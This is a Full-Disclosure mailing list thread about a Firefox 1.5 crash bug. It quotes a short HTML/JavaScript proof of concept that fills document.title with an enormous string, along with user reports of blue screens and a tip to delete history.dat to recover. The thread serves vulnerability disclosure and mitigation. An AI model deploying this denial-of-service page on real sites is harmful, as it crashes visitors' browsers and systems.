Re: Re: Firefox 1.5 buffer overflow (poc) - more buffer

[Juha-Matti Laurio <juha-matti.laurio () netti fi>]

Thanks for sharing the profile location information to prevent crash at 
the next browser start.
In fact, this was covered at Internet Storm Center earlier on Friday morning:
http://isc.sans.org/diary.php?storyid=920

- Juha-Matti

(Time to shorten long replies..)
--clip--
> tip: only erasing \Documents and
> Settings\Administrador.COMP-NAME\Dados de
> aplicativos\Mozilla\Firefox\Profiles\history.dat
>
> your firefox will start without crash your machine (blue screen) every
> time you load it...
>
> t+
>
> 2005/12/9, Fósforo <fosforo () gmail com>:
> > It works here.
> >
> > seems it depends on how much ram you've. i got 2 blue screens, after
> > changed the code a bit. the first one was about MEMORY_MANAGEMENT and
> > the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurs
> > without user interaction, the second one i just've opened firefox, not
> > the bug file (maybe cache ?)
> >
> > ps: i've 1Gb of ram
> >
> > <html><head><title>heh</title><script type="text/javascript">
> > function ex() {
> >        var buffer = "";
> >        for (var i = 0; i < 5000; i++) {
> >                buffer += "A";
> >        }
> >        var buffer2 = buffer;
> >        var buffer3 = buffer2;
> >        for (i = 0; i < 500; i++) {
> >                buffer2 += buffer;
> >                for (i = 0; i < 500; i++) {
> >                         buffer3 += buffer2;
> >                }
> >        }
> >        document.title = buffer2;
> > }
> > </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
> > </a></body></html>
> >

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/